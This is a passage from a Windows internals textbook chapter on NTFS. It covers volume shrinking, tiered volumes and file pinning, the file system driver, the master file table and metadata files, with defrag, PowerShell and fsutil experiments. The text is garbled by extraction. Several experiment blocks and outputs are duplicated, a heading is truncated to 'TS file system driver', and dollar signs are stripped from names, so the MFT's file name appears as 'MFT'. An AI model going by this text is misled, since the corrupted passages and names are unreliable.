= 341.05 GB
In the example, the volume size was 475.87 GB, with 343.80 GB of free space. Only 341 GB
have been erased and trimmed. Obviously, if you execute the command on volumes backed by
a classical HDD, you will get back an error. (The operation requested is not supported by the
hardware backing the volume.)
Dynamic partitioning
The NTFS driver allows users to dynamically resize any partition, including the system partition, either
shrinking or expanding it (if enough space is available). Expanding a partition is easy if enough space
exists on the disk and the expansion is performed through the FSCTL_EXPAND_VOLUME file system
control code. Shrinking a partition is a more complicated process because it requires moving any file
system data that is currently in the area to be thrown away to the region that will still remain after the
shrinking process (a mechanism similar to defragmentation). Shrinking is implemented by two compo-
nents: the shrinking engine and the file system driver.
The shrinking engine is implemented in user mode. It communicates with NTFS to determine the
maximum number of reclaimable bytes—that is, how much data can be moved from the region that
will be resized into the region that will remain. The shrinking engine uses the standard defragmenta-
tion mechanism shown earlier, which doesn’t support relocating page file fragments that are in use or
any other files that have been marked as unmovable with the FSCTL_MARK_HANDLE file system con-
trol code (like the hibernation file). The master file table backup (MftMirr), the NTFS metadata transac-
tion log (LogFile), and the volume label file (Volume) cannot be moved, which limits the minimum
size of the shrunk volume and causes wasted space.
EXPERIMENT: Retrim an SSD volume
You can execute a Retrim on a fast SSD or NVMe volume by using the defrag.exe /L command,
as in the following example:
D:\>defrag /L c:
Microsoft Drive Optimizer
Copyright (c) Microsoft Corp.
Invoking retrim on (C:)...
The operation completed successfully.
Post Defragmentation Report:
Volume Information:
Volume size
= 475.87 GB
Free space
= 343.80 GB
Retrim:
Total space trimmed
= 341.05 GB
In the example, the volume size was 475.87 GB, with 343.80 GB of free space. Only 341 GB
have been erased and trimmed. Obviously, if you execute the command on volumes backed by
a classical HDD, you will get back an error. (The operation requested is not supported by the
hardware backing the volume.)
CHAPTER 11
Caching and file systems
647
The file system driver shrinking code is responsible for ensuring that the volume remains in a consis-
tent state throughout the shrinking process. To do so, it exposes an interface that uses three requests
that describe the current operation, which are sent through the FSCTL_SHRINK_VOLUME control code:
I
The ShrinkPrepare request, which must be issued before any other operation. This request
takes the desired size of the new volume in sectors and is used so that the file system can block
further allocations outside the new volume boundary. The ShrinkPrepare request doesn’t verify
whether the volume can actually be shrunk by the specified amount, but it does ensure that the
amount is numerically valid and that there aren’t any other shrinking operations ongoing. Note
that after a prepare operation, the file handle to the volume becomes associated with the shrink
request. If the file handle is closed, the operation is assumed to be aborted.
I
The ShrinkCommit request, which the shrinking engine issues after a ShrinkPrepare request. In
this state, the file system attempts the removal of the requested number of clusters in the most
recent prepare request. (If multiple prepare requests have been sent with different sizes, the last
one is the determining one.) The ShrinkCommit request assumes that the shrinking engine has
completed and will fail if any allocated blocks remain in the area to be shrunk.
I
The ShrinkAbort request, which can be issued by the shrinking engine or caused by events such
as the closure of the file handle to the volume. This request undoes the ShrinkCommit operation
by returning the partition to its original size and allows new allocations outside the shrunk region
to occur again. However, defragmentation changes made by the shrinking engine remain.
If a system is rebooted during a shrinking operation, NTFS restores the file system to a consistent
state via its metadata recovery mechanism, explained later in the chapter. Because the actual shrink
operation isn’t executed until all other operations have been completed, the volume retains its original
size and only defragmentation operations that had already been flushed out to disk persist.
Finally, shrinking a volume has several effects on the volume shadow copy mechanism. Recall that the
copy-on-write mechanism allows VSS to simply retain parts of the file that were actually modified while
still linking to the original file data. For deleted files, this file data will not be associated with visible files
but appears as free space instead—free space that will likely be located in the area that is about to be
shrunk. The shrinking engine therefore communicates with VSS to engage it in the shrinking process. In
summary, the VSS mechanism’s job is to copy deleted file data into its differencing area and to increase
the differencing area as required to accommodate additional data. This detail is important because it
poses another constraint on the size to which even volumes with ample free space can shrink.
NTFS support for tiered volumes
Tiered volumes are composed of different types of storage devices and underlying media. Tiered vol-
umes are usually created on the top of a single physical or virtual disk. Storage Spaces provides virtual
disks that are composed of multiple physical disks, which can be of different types (and have different
performance): fast NVMe disks, SSD, and Rotating Hard-Disk. A virtual disk of this type is called a tiered
disk. (Storage Spaces uses the name Storage Tiers.) On the other hand, tiered volumes could be created
on the top of physical SMR disks, which have a conventional “random-access” fast zone and a “strictly
sequential” capacity area. All tiered volumes have the common characteristic that they are composed
648
CHAPTER 11
Caching and file systems
by a “performance” tier, which supports fast random I/O, and a “capacity” tier, which may or may not
support random I/O, is slower, and has a large capacity.
Note SMR disks, tiered volumes, and Storage Spaces will be discussed in more detail later in
this chapter.
The NTFS File System driver supports tiered volumes in multiple ways:
I
The volume is split in two zones, which correspond to the tiered disk areas (capacity and
performance).
I
The new $DSC attribute (of type LOGGED_UTILITY_STREAM) specifies which tier the file
should be stored in. NTFS exposes a new “pinning” interface, which allows a file to be locked in a
particular tier (from here derives the term “pinning”) and prevents the file from being moved by
the tiering engine.
I
The Storage Tiers Management service has a central role in supporting tiered volumes. The
NTFS file system driver records ETW “heat” events every time a file stream is read or written.
The tiering engine consumes these events, accumulates them (in 1-MB chunks), and periodically
records them in a JET database (once every hour). Every four hours, the tiering engine processes
the Heat database and through a complex “heat aging” algorithm decides which file is consid-
ered recent (hot) and which is considered old (cold). The tiering engine moves the files between
the performance and the capacity tiers based on the calculated Heat data.
Furthermore, the NTFS allocator has been modified to allocate file clusters based on the tier area
that has been specified in the $DSC attribute. The NTFS Allocator uses a specific algorithm to decide
from which tier to allocate the volume’s clusters. The algorithm operates by performing checks in the
following order:
1.
If the file is the Volume USN Journal, always allocate from the Capacity tier.
2.
MFT entries (File Records) and system metadata files are always allocated from the
Performance tier.
3.
If the file has been previously explicitly “pinned” (meaning that the file has the $DSC attribute),
allocate from the specified storage tier.
4.
If the system runs a client edition of Windows, always prefer the Performance tier; otherwise,
allocate from the Capacity tier.
5.
If there is no space in the Performance tier, allocate from the Capacity tier.
An application can specify the desired storage tier for a file by using the NtSetInformationFile API
with the FileDesiredStorageClassInformation information class. This operation is called file pinning, and,
if executed on a handle of a new created file, the central allocator will allocate the new file content in
the specified tier. Otherwise, if the file already exists and is located on the wrong tier, the tiering engine
will move the file to the desired tier the next time it runs. (This operation is called Tier optimization and
can be initiated by the Tiering Engine scheduled task or the SchedulerDefrag task.)
CHAPTER 11
Caching and file systems
649
Note It’s important to note here that the support for tiered volumes in NTFS, described here,
is completely different from the support provided by the ReFS file system driver.
EXPERIMENT: Witnessing file pinning in tiered volumes
As we have described in the previous section, the NTFS allocator uses a specific algorithm to
decide which tier to allocate from. In this experiment, you copy a big file into a tiered volume
and understand what the implications of the File Pinning operation are. After the copy finishes,
open an administrative PowerShell window by right-clicking on the Start menu icon and select-
ing Windows PowerShell (Admin) and use the Get-FileStorageTier command to get the tier
information for the file:
PS E:\> Get-FileStorageTier -FilePath 'E:\Big_Image.iso' | FL FileSize,
DesiredStorageTierClass, FileSizeOnPerformanceTierClass, FileSizeOnCapacityTierClass,
PlacementStatus, State
FileSize
: 4556566528
DesiredStorageTierClass
: Unknown
FileSizeOnPerformanceTierClass : 0
FileSizeOnCapacityTierClass : 4556566528
PlacementStatus
: Unknown
State
: Unknown
The example shows that the Big_Image.iso file has been allocated from the Capacity Tier. (The
example has been executed on a Windows Server system.) To confirm this, just copy the file from
the tiered disk to a fast SSD volume. You should see a slow transfer speed (usually between 160
and 250 MB/s depending on the rotating disk speed):
EXPERIMENT: Witnessing file pinning in tiered volumes
As we have described in the previous section, the NTFS allocator uses a specific algorithm to
decide which tier to allocate from. In this experiment, you copy a big file into a tiered volume
and understand what the implications of the File Pinning operation are. After the copy finishes,
open an administrative PowerShell window by right-clicking on the Start menu icon and select-
ing Windows PowerShell (Admin) and use the Get-FileStorageTier command to get the tier
information for the file:
PS E:\> Get-FileStorageTier -FilePath 'E:\Big_Image.iso' | FL FileSize,
DesiredStorageTierClass, FileSizeOnPerformanceTierClass, FileSizeOnCapacityTierClass,
PlacementStatus, State
FileSize
: 4556566528
DesiredStorageTierClass
: Unknown
FileSizeOnPerformanceTierClass : 0
FileSizeOnCapacityTierClass : 4556566528
PlacementStatus
: Unknown
State
: Unknown
The example shows that the Big_Image.iso file has been allocated from the Capacity Tier. (The
example has been executed on a Windows Server system.) To confirm this, just copy the file from
the tiered disk to a fast SSD volume. You should see a slow transfer speed (usually between 160
and 250 MB/s depending on the rotating disk speed):
650
CHAPTER 11
Caching and file systems
You can now execute the “pin” request through the Set-FileStorageTier command, like in the
following example:
PS E:\> Get-StorageTier -MediaType SSD | FL FriendlyName, Size, FootprintOnPool, UniqueId
FriendlyName : SSD
Size : 128849018880
FootprintOnPool : 128849018880
UniqueId
: {448abab8-f00b-42d6-b345-c8da68869020}
PS E:\> Set-FileStorageTier -FilePath 'E:\Big_Image.iso' -DesiredStorageTierFriendlyName
'SSD'
PS E:\> Get-FileStorageTier -FilePath 'E:\Big_Image.iso' | FL FileSize,
DesiredStorageTierClass, FileSizeOnPerformanceTierClass, FileSizeOnCapacityTierClass,
PlacementStatus, State
FileSize
: 4556566528
DesiredStorageTierClass
: Performance
FileSizeOnPerformanceTierClass : 0
FileSizeOnCapacityTierClass : 4556566528
PlacementStatus
: Not on tier
State
: Pending
The example above shows that the file has been correctly pinned on the Performance
tier, but its content is still stored in the Capacity tier. When the Tiering Engine scheduled task
runs, it moves the file extents from the Capacity to the Performance tier. You can force a Tier
Optimization by running the Drive optimizer through the defrag.exe /g built-in tool:
PS E:> defrag /g /h e:
Microsoft Drive Optimizer
Copyright (c) Microsoft Corp.
Invoking tier optimization on Test (E:)...
Pre-Optimization Report:
Volume Information:
Volume size
= 2.22 TB
Free space
= 1.64 TB
Total fragmented space
= 36%
Largest free space size = 1.56 TB
Note: File fragments larger than 64MB are not included in the fragmentation statistics.
The operation completed successfully.
Post Defragmentation Report:
Volume Information:
Volume size
= 2.22 TB
Free space
= 1.64 TB
Storage Tier Optimization Report:
You can now execute the “pin” request through the Set-FileStorageTier command, like in the
following example:
PS E:\> Get-StorageTier -MediaType SSD | FL FriendlyName, Size, FootprintOnPool, UniqueId
FriendlyName : SSD
Size : 128849018880
FootprintOnPool : 128849018880
UniqueId
: {448abab8-f00b-42d6-b345-c8da68869020}
PS E:\> Set-FileStorageTier -FilePath 'E:\Big_Image.iso' -DesiredStorageTierFriendlyName
'SSD'
PS E:\> Get-FileStorageTier -FilePath 'E:\Big_Image.iso' | FL FileSize,
DesiredStorageTierClass, FileSizeOnPerformanceTierClass, FileSizeOnCapacityTierClass,
PlacementStatus, State
FileSize
: 4556566528
DesiredStorageTierClass
: Performance
FileSizeOnPerformanceTierClass : 0
FileSizeOnCapacityTierClass : 4556566528
PlacementStatus
: Not on tier
State
: Pending
The example above shows that the file has been correctly pinned on the Performance
tier, but its content is still stored in the Capacity tier. When the Tiering Engine scheduled task
runs, it moves the file extents from the Capacity to the Performance tier. You can force a Tier
Optimization by running the Drive optimizer through the defrag.exe /g built-in tool:
PS E:> defrag /g /h e:
Microsoft Drive Optimizer
Copyright (c) Microsoft Corp.
Invoking tier optimization on Test (E:)...
Pre-Optimization Report:
Volume Information:
Volume size
= 2.22 TB
Free space
= 1.64 TB
Total fragmented space
= 36%
Largest free space size = 1.56 TB
Note: File fragments larger than 64MB are not included in the fragmentation statistics.
The operation completed successfully.
Post Defragmentation Report:
Volume Information:
Volume size
= 2.22 TB
Free space
= 1.64 TB
Storage Tier Optimization Report:
CHAPTER 11
Caching and file systems
651
% I/Os Serviced from Perf Tier Perf Tier Size Required
100%
28.51 GB *
95%
22.86 GB
...
20%
2.44 GB
15%
1.58 GB
10%
873.80 MB
5%
361.28 MB
* Current size of the Performance tier: 474.98 GB
Percent of total I/Os serviced from the Performance tier: 99%
Size of files pinned to the Performance tier: 4.21 GB
Percent of total I/Os: 1%
Size of files pinned to the Capacity tier: 0 bytes
Percent of total I/Os: 0%
The Drive Optimizer has confirmed the “pinning” of the file. You can check again the “pinning”
status by executing the Get-FileStorageTier command and by copying the file again to an SSD
volume. This time the transfer rate should be much higher, because the file content is entirely
located in the Performance tier.
PS E:\> Get-FileStorageTier -FilePath 'E:\Big_Image.iso' | FL FileSize, DesiredStorageTierClass,
FileSizeOnPerformanceTierClass, FileSizeOnCapacityTierClass, PlacementStatus, State
FileSize
: 4556566528
DesiredStorageTierClass
: Performance
FileSizeOnPerformanceTierClass : 0
FileSizeOnCapacityTierClass : 4556566528
PlacementStatus
: Completely on tier
State
: OK
You could repeat the experiment in a client edition of Windows 10, by pinning the file in the
Capacity tier (client editions of Windows 10 allocate file’s clusters from the Performance tier by
default). The same “pinning” functionality has been implemented into the FsTool application
available in this book’s downloadable resources, which can be used to copy a file directly into a
preferred tier.
% I/Os Serviced from Perf Tier Perf Tier Size Required
100%
28.51 GB *
95%
22.86 GB
...
20%
2.44 GB
15%
1.58 GB
10%
873.80 MB
5%
361.28 MB
* Current size of the Performance tier: 474.98 GB
Percent of total I/Os serviced from the Performance tier: 99%
Size of files pinned to the Performance tier: 4.21 GB
Percent of total I/Os: 1%
Size of files pinned to the Capacity tier: 0 bytes
Percent of total I/Os: 0%
The Drive Optimizer has confirmed the “pinning” of the file. You can check again the “pinning”
status by executing the Get-FileStorageTier command and by copying the file again to an SSD
Get-FileStorageTier command and by copying the file again to an SSD
Get-FileStorageTier
volume. This time the transfer rate should be much higher, because the file content is entirely
located in the Performance tier.
PS E:\> Get-FileStorageTier -FilePath 'E:\Big_Image.iso' | FL FileSize, DesiredStorageTierClass,
FileSizeOnPerformanceTierClass, FileSizeOnCapacityTierClass, PlacementStatus, State
FileSize
: 4556566528
DesiredStorageTierClass
: Performance
FileSizeOnPerformanceTierClass : 0
FileSizeOnCapacityTierClass : 4556566528
PlacementStatus
: Completely on tier
State
: OK
You could repeat the experiment in a client edition of Windows 10, by pinning the file in the
Capacity tier (client editions of Windows 10 allocate file’s clusters from the Performance tier by
default). The same “pinning” functionality has been implemented into the FsTool application
available in this book’s downloadable resources, which can be used to copy a file directly into a
preferred tier.
652
CHAPTER 11
Caching and file systems
TS file system driver
As described in Chapter 6 in Part I, in the framework of the Windows I/O system, NTFS and other file
systems are loadable device drivers that run in kernel mode. They are invoked indirectly by applica-
tions that use Windows or other I/O APIs. As Figure 11-28 shows, the Windows environment subsystems
call Windows system services, which in turn locate the appropriate loaded drivers and call them. (For a
description of system service dispatching, see the section “System service dispatching” in Chapter 8.)
Environment
subsystem
or DLL
User mode
Kernel mode
Kernel
Object
manager
Security
reference
monitor
Windows
executive
…
Advanced
local
procedure
call
facility
Memory
manager
Windows system services
NTFS driver
Volume
manager
Disk driver
I/O manager
FIGURE 11-28 Components of the Windows I/O system.
The layered drivers pass I/O requests to one another by calling the Windows executive’s I/O man-
ager. Relying on the I/O manager as an intermediary allows each driver to maintain independence so
that it can be loaded or unloaded without affecting other drivers. In addition, the NTFS driver interacts
with the three other Windows executive components, shown in the left side of Figure 11-29, which are
closely related to file systems.
The log file service (LFS) is the part of NTFS that provides services for maintaining a log of disk
writes. The log file that LFS writes is used to recover an NTFS-formatted volume in the case of a system
failure. (See the section “Log file service” later in this chapter.)
CHAPTER 11
Caching and file systems
653
Log file
service
Write the
cache
Cache
manager
Access the mapped
file or flush the cache
Memory
manager
Flush the
log file
Log the
transaction
Read/write the file
Load data
from disk
into
memory
Read/write a
mirrored or
striped volume
Read/write
the disk
Disk driver
Volume
manager
NTFS driver
I/O manager
FIGURE 11-29 NTFS and related components.
As we have already described, the cache manager is the component of the Windows executive that
provides systemwide caching services for NTFS and other file system drivers, including network file sys-
tem drivers (servers and redirectors). All file systems implemented for Windows access cached files by
mapping them into system address space and then accessing the virtual memory. The cache manager
provides a specialized file system interface to the Windows memory manager for this purpose. When
a program tries to access a part of a file that isn’t loaded into the cache (a cache miss), the memory
manager calls NTFS to access the disk driver and obtain the file contents from disk. The cache manager
optimizes disk I/O by using its lazy writer threads to call the memory manager to flush cache contents
to disk as a background activity (asynchronous disk writing).
NTFS, like other file systems, participates in the Windows object model by implementing files as
objects. This implementation allows files to be shared and protected by the object manager, the com-
ponent of Windows that manages all executive-level objects. (The object manager is described in the
section “Object manager” in Chapter 8.)
An application creates and accesses files just as it does other Windows objects: by means of object
handles. By the time an I/O request reaches NTFS, the Windows object manager and security system
have already verified that the calling process has the authority to access the file object in the way it is
attempting to. The security system has compared the caller’s access token to the entries in the access
control list for the file object. (See Chapter 7 in Part 1 for more information about access control lists.)
The I/O manager has also transformed the file handle into a pointer to a file object. NTFS uses the
information in the file object to access the file on disk.
Figure 11-30 shows the data structures that link a file handle to the file system’s on-disk structure.
654
CHAPTER 11
Caching and file systems
Object
manager
data
structures
Process
…
…
Handle
table
File object
File object
NTFS data
structures
(used to manage
the on-disk structure)
Stream
control
blocks
File
control
block
Data
attribute
Named
stream
Master file
table
NTFS
database
(on disk)
FIGURE 11-30 NTFS data structures.
NTFS follows several pointers to get from the file object to the location of the file on disk. As
Figure 11-30 shows, a file object, which represents a single call to the open-file system service, points to
a stream control block (SCB) for the file attribute that the caller is trying to read or write. In Figure 11-30,
a process has opened both the unnamed data attribute and a named stream (alternate data attribute)
for the file. The SCBs represent individual file attributes and contain information about how to find
specific attributes within a file. All the SCBs for a file point to a common data structure called a file con-
trol block (FCB). The FCB contains a pointer (actually, an index into the MFT, as explained in the section
“File record numbers” later in this chapter) to the file’s record in the disk-based master file table (MFT),
which is described in detail in the following section.
NTFS on-disk structure
This section describes the on-disk structure of an NTFS volume, including how disk space is divided and
organized into clusters, how files are organized into directories, how the actual file data and attribute
information is stored on disk, and finally, how NTFS data compression works.
CHAPTER 11
Caching and file systems
655
Volumes
The structure of NTFS begins with a volume. A volume corresponds to a logical partition on a disk, and
it’s created when you format a disk or part of a disk for NTFS. You can also create a RAID virtual disk
that spans multiple physical disks by using Storage Spaces, which is accessible through the Manage
Storage Spaces control panel snap-in, or by using Storage Spaces commands available from the Windows
PowerShell (like the New-StoragePool command, used to create a new storage pool. A comprehensive
list of PowerShell commands for Storage Spaces is available at the following link: https://docs.microsoft
.com /en-us/powershell/module/storagespaces/)
A disk can have one volume or several. NTFS handles each volume independently of the others.
Three sample disk configurations for a 2-TB hard disk are illustrated in Figure 11-31.
C:
(2 TB)
NTFS
Volume
C:
(1 TB)
D:
(1 TB)
NTFS
Volume 1
ReFS
Volume 2
C:
(1 TB)
D:
(1 TB)
ReFS
Volume
exFAT
Volume
FIGURE 11-31 Sample disk configurations.
A volume consists of a series of files plus any additional unallocated space remaining on the disk
partition. In all FAT file systems, a volume also contains areas specially formatted for use by the file
system. An NTFS or ReFS volume, however, stores all file system data, such as bitmaps and directories,
and even the system bootstrap, as ordinary files.
Note The on-disk format of NTFS volumes on Windows 10 and Windows Server 2019 is ver-
sion 3.1, the same as it has been since Windows XP and Windows Server 2003. The version
number of a volume is stored in its Volume metadata file.
Clusters
The cluster size on an NTFS volume, or the cluster factor, is established when a user formats the volume
with either the format command or the Disk Management MMC snap-in. The default cluster factor
varies with the size of the volume, but it is an integral number of physical sectors, always a power of 2
(1 sector, 2 sectors, 4 sectors, 8 sectors, and so on). The cluster factor is expressed as the number of
bytes in the cluster, such as 512 bytes, 1 KB, 2 KB, and so on.
656
CHAPTER 11
Caching and file systems
Internally, NTFS refers only to clusters. (However, NTFS forms low-level volume I/O operations such
that clusters are sector-aligned and have a length that is a multiple of the sector size.) NTFS uses the
cluster as its unit of allocation to maintain its independence from physical sector sizes. This indepen-
dence allows NTFS to efficiently support very large disks by using a larger cluster factor or to support
newer disks that have a sector size other than 512 bytes. On a larger volume, use of a larger cluster fac-
tor can reduce fragmentation and speed allocation, at the cost of wasted disk space. (If the cluster size
is 64 KB, and a file is only 16 KB, then 48 KB are wasted.) Both the format command available from the
command prompt and the Format menu option under the All Tasks option on the Action menu in the
Disk Management MMC snap-in choose a default cluster factor based on the volume size, but you can
override this size.
NTFS refers to physical locations on a disk by means of logical cluster numbers (LCNs). LCNs are
simply the numbering of all clusters from the beginning of the volume to the end. To convert an LCN
to a physical disk address, NTFS multiplies the LCN by the cluster factor to get the physical byte offset
on the volume, as the disk driver interface requires. NTFS refers to the data within a file by means of
virtual cluster numbers (VCNs). VCNs number the clusters belonging to a particular file from 0 through
m. VCNs aren’t necessarily physically contiguous, however; they can be mapped to any number of LCNs
on the volume.
Master file table
In NTFS, all data stored on a volume is contained in files, including the data structures used to locate
and retrieve files, the bootstrap data, and the bitmap that records the allocation state of the entire vol-
ume (the NTFS metadata). Storing everything in files allows the file system to easily locate and maintain
the data, and each separate file can be protected by a security descriptor. In addition, if a particular
part of the disk goes bad, NTFS can relocate the metadata files to prevent the disk from becoming
inaccessible.
The MFT is the heart of the NTFS volume structure. The MFT is implemented as an array of file re-
cords. The size of each file record can be 1 KB or 4 KB, as defined at volume-format time, and depends
on the type of the underlying physical medium: new physical disks that have 4 KB native sectors size
and tiered disks generally use 4 KB file records, while older disks that have 512 bytes sectors size use 1
KB file records. The size of each MFT entry does not depend on the clusters size and can be overridden
at volume-format time through the Format /l command. (The structure of a file record is described in
the “File records” section later in this chapter.) Logically, the MFT contains one record for each file on
the volume, including a record for the MFT itself. In addition to the MFT, each NTFS volume includes
a set of metadata files containing the information that is used to implement the file system structure.
Each of these NTFS metadata files has a name that begins with a dollar sign () and is hidden. For
example, the file name of the MFT is MFT. The rest of the files on an NTFS volume are normal user files
and directories, as shown in Figure 11-32.
Usually, each MFT record corresponds to a different file. If a file has a large number of attributes or
becomes highly fragmented, however, more than one record might be needed for a single file. In such
cases, the first MFT record, which stores the locations of the others, is called the base file record.
CHAPTER 11
Caching and file systems
657
$MFT - MFT
$MFTMirr - MFT mirror
$LogFile - Log file
\ - Root directory
$Volume - Volume file
$AttrDef - Attribute definition table
Reserved for NTFS
metadata files
0
1
2
3
4
5
$BitMap - Volume cluster allocation file
$Boot - Boot sector
$BadClus - Bad-cluster file
$Extend - Extended metadata directory
$Secure - Security settings file
$UpCase - Uppercase character mapping
6
7
8
9
10
11
12
Unused
$Extend\$Quota - Quota information
$Extend\$ObjId - Distributed link tracking information
$Extend\$RmMetadata\$Repair - RM repair information
$Extend\$Reparse - Back references to reparse points
$Extend\$RmMetadata - RM metadata directory
23
24
25
26
27
28
29
30
31
32
33
34
35
Unused
$Extend\$Deleted - POSIX deleted files
$Extend\$RmMetadata\$TxfLog - TxF log directory
$Extend\$RmMetadata\$Txf - TxF metadata directory
$Extend\$RmMetadata\$TxfLog\$Tops - TOPS file
$Extend\$RmMetadata\$TxfLog\$TxfLog.blf - TxF BLF
$TxfLogContainer00000000000000000001
$TxfLogContainer00000000000000000002
FIGURE 11-32 File records for NTFS metadata files in the MFT.
When it first accesses a volume, NTFS must mount it—that is, read metadata from the disk and
construct internal data structures so that it can process application file system accesses. To mount the
volume, NTFS looks in the volume boot record (VBR) (located at LCN 0), which contains a data structure
called the boot parameter block (BPB), to find the physical disk address of the MFT. The MFT’s file record
is the first entry in the table; the second file record points to a file located in the middle of the disk called
the MFT mirror (file name MFTMirr) that contains a copy of the first four rows of the MFT. This partial
copy of the MFT is used to locate metadata files if part of the MFT file can’t be read for some reason.
Once NTFS finds the file record for the MFT, it obtains the VCN-to-LCN mapping information in the
file record’s data attribute and stores it into memory. Each run (runs are explained later in this chapter
in the section “Resident and nonresident attributes”) has a VCN-to-LCN mapping and a run length
because that’s all the information necessary to locate the LCN for any VCN. This mapping information
658
CHAPTER 11
Caching and file systems
tells NTFS where the runs containing the MFT are located on the disk. NTFS then processes the MFT re-
cords for several more metadata files and opens the files. Next, NTFS performs its file system recovery
operation (described in the section “Recovery” later in this chapter), and finally, it opens its remaining
metadata files. The volume is now ready for user access.
Note For the sake of clarity, the text and diagrams in this chapter depict a run as including
a VCN, an LCN, and a run length. NTFS actually compresses this information on disk into an
LCN/next-VCN pair. Given a starting VCN, NTFS can determine the length of a run by sub-
tracting the starting VCN from the next VCN.
As the system runs, NTFS writes to another important metadata file, the log file (file name LogFile).
NTFS uses the log file to record all operations that affect the NTFS volume structure, including file cre-
ation or any commands, such as copy, that alter the directory structure. The log file is used to recover an
NTFS volume after a system failure and is also described in the “Recovery” section.
Another entry in the MFT is reserved for the root directory (also known as \; for example, C:\). Its file
record contains an index of the files and directories stored in the root of the NTFS directory structure.
When NTFS is first asked to open a file, it begins its search for the file in the root directory’s file record.
After opening a file, NTFS stores the file’s MFT record number so that it can directly access the file’s
MFT record when it reads and writes the file later.
NTFS records the allocation state of the volume in the bitmap file (file name BitMap). The data
attribute for the bitmap file contains a bitmap, each of whose bits represents a cluster on the volume,
identifying whether the cluster is free or has been allocated to a file.
The security file (file name Secure) stores the volume-wide security descriptor database. NTFS files
and directories have individually settable security descriptors, but to conserve space, NTFS stores the
settings in a common file, which allows files and directories that have the same security settings to
reference the same security descriptor. In most environments, entire directory trees have the same
security settings, so this optimization provides a significant saving of disk space.
Another system file, the boot file (file name Boot), stores the Windows bootstrap code if the volume
is a system volume. On nonsystem volumes, there is code that displays an error message on the screen
if an attempt is made to boot from that volume. For the system to boot, the bootstrap code must be
located at a specific disk address so that the Boot Manager can find it. During formatting, the format
command defines this area as a file by creating a file record for it. All files are in the MFT, and all clusters
are either free or allocated to a file—there are no hidden files or clusters in NTFS, although some files
(metadata) are not visible to users. The boot file as well as NTFS metadata files can be individually
protected by means of the security descriptors that are applied to all Windows objects. Using this “ev-
erything on the disk is a file” model also means that the bootstrap can be modified by normal file I/O,
although the boot file is protected from editing.
NTFS also maintains a bad-cluster file (file name BadClus) for recording any bad spots on the disk
volume and a file known as the volume file (file name Volume), which contains the volume name, the
CHAPTER 11
Caching and file systems
659
version of NTFS for which the volume is formatted, and a number of flag bits that indicate the state and
health of the volume, such as a bit that indicates that the volume is corrupt and must be repaired by
the Chkdsk utility. (The Chkdsk utility is covered in more detail later in the chapter.) The uppercase file
(file name UpCase) includes a translation table between lowercase and uppercase characters. NTFS
maintains a file containing an attribute definition table (file name AttrDef) that defines the attribute
types supported on the volume and indicates whether they can be indexed, recovered during a system
recovery operation, and so on.
Note Figure 11-32 shows the Master File Table of a NTFS volume and indicates the specific
entries in which the metadata files are located. It is worth mentioning that file records at po-
sition less than 16 are guaranteed to be fixed. Metadata files located at entries greater than
16 are subject to the order in which NTFS creates them. Indeed, the format tool doesnt cre-
ate any metadata file above position 16; this is the duty of the NTFS file system driver while
mounting the volume for the first time (after the formatting has been completed). The order
of the metadata files generated by the file system driver is not guaranteed.
NTFS stores several metadata files in the extensions (directory name Extend) metadata direc-
tory, including the obect identifier file (file name ObjId), the quota file (file name Quota), the change
journal file (file name UsnJrnl), the reparse point file (file name Reparse), the Posix delete support
directory (Deleted), and the default resource manager directory (directory name RmMetadata). These
files store information related to extended features of NTFS. The object identifier file stores file object
IDs, the quota file stores quota limit and behavior information on volumes that have quotas enabled,
the change journal file records file and directory changes, and the reparse point file stores information
about which files and directories on the volume include reparse point data.
The Posix Delete directory (Deleted) contains files, which are invisible to the user, that have been
deleted using the new Posix semantic. Files deleted using the Posix semantic will be moved in this
directory when the application that has originally requested the file deletion closes the file handle.
Other applications that may still have a valid reference to the file continue to run while the file’s name is
deleted from the namespace. Detailed information about the Posix deletion has been provided in the
previous section.
The default resource manager directory contains directories related to transactional NTFS (TxF)
support, including the transaction log directory (directory name TxfLog), the transaction isolation
directory (directory name Txf), and the transaction repair directory (file name Repair). The transac-
tion log directory contains the TxF base log file (file name TxfLog.blf) and any number of log container
files, depending on the size of the transaction log, but it always contains at least two: one for the Kernel
Transaction Manager (KTM) log stream (file name TxfLogContainer00000000000000000001), and
one for the TxF log stream (file name TxfLogContainer00000000000000000002). The transaction log
directory also contains the TxF old page stream (file name Tops), which we’ll describe later.
660
CHAPTER 11
Caching and file systems
EXPERIMENT: Viewing NTFS information
You can use the built-in Fsutil.exe command-line program to view information about an NTFS
volume, including the placement and size of the MFT and MFT zone:
d:\>fsutil fsinfo ntfsinfo d:
NTFS Volume Serial Number :
0x48323940323933f2
NTFS Version :
3.1
LFS Version :
2.0
Number Sectors :
0x000000011c5f6fff
Total Clusters :
0x00000000238bedff
Free Clusters :
0x000000001a6e5925
Total Reserved :
0x00000000000011cd
Bytes Per Sector :
512
Bytes Per Physical Sector :
4096
Bytes Per Cluster :
4096
Bytes Per FileRecord Segment : 4096
Clusters Per FileRecord Segment : 1
Mft Valid Data Length :
0x0000000646500000
Mft Start Lcn :
0x00000000000c0000
Mft2 Start Lcn :
0x0000000000000002
Mft Zone Start :
0x00000000069f76e0
Mft Zone End :
0x00000000069f7700
Max Device Trim Extent Count : 4294967295
Max Device Trim Byte Count :
0x10000000
Max Volume Trim Extent Count : 62
Max Volume Trim Byte Count :
0x10000000
Resource Manager Identifier :
81E83020-E6FB-11E8-B862-D89EF33A38A7
In this example, the D: volume uses 4 KB file records (MFT entries), on a 4 KB native sector size
disk (which emulates old 512-byte sectors) and uses 4 KB clusters.
File record numbers
A file on an NTFS volume is identified by a 64-bit value called a file record number, which consists of a
file number and a sequence number. The file number corresponds to the position of the file’s file record
in the MFT minus 1 (or to the position of the base file record minus 1 if the file has more than one file
record). The sequence number, which is incremented each time an MFT file record position is reused,
enables NTFS to perform internal consistency checks. A file record number is illustrated in Figure 11-33.
File number
Sequence
number
63
47
0
FIGURE 11-33 File record number.
EXPERIMENT: Viewing NTFS information
You can use the built-in Fsutil.exe command-line program to view information about an NTFS
volume, including the placement and size of the MFT and MFT zone:
d:\>fsutil fsinfo ntfsinfo d:
NTFS Volume Serial Number :
0x48323940323933f2
NTFS Version :
3.1
LFS Version :
2.0
Number Sectors :
0x000000011c5f6fff
Total Clusters :
0x00000000238bedff
Free Clusters :
0x000000001a6e5925
Total Reserved :
0x00000000000011cd
Bytes Per Sector :
512
Bytes Per Physical Sector :
4096
Bytes Per Cluster :
4096
Bytes Per FileRecord Segment : 4096
Clusters Per FileRecord Segment : 1
Mft Valid Data Length :
0x0000000646500000
Mft Start Lcn :
0x00000000000c0000
Mft2 Start Lcn :
0x0000000000000002
Mft Zone Start :
0x00000000069f76e0
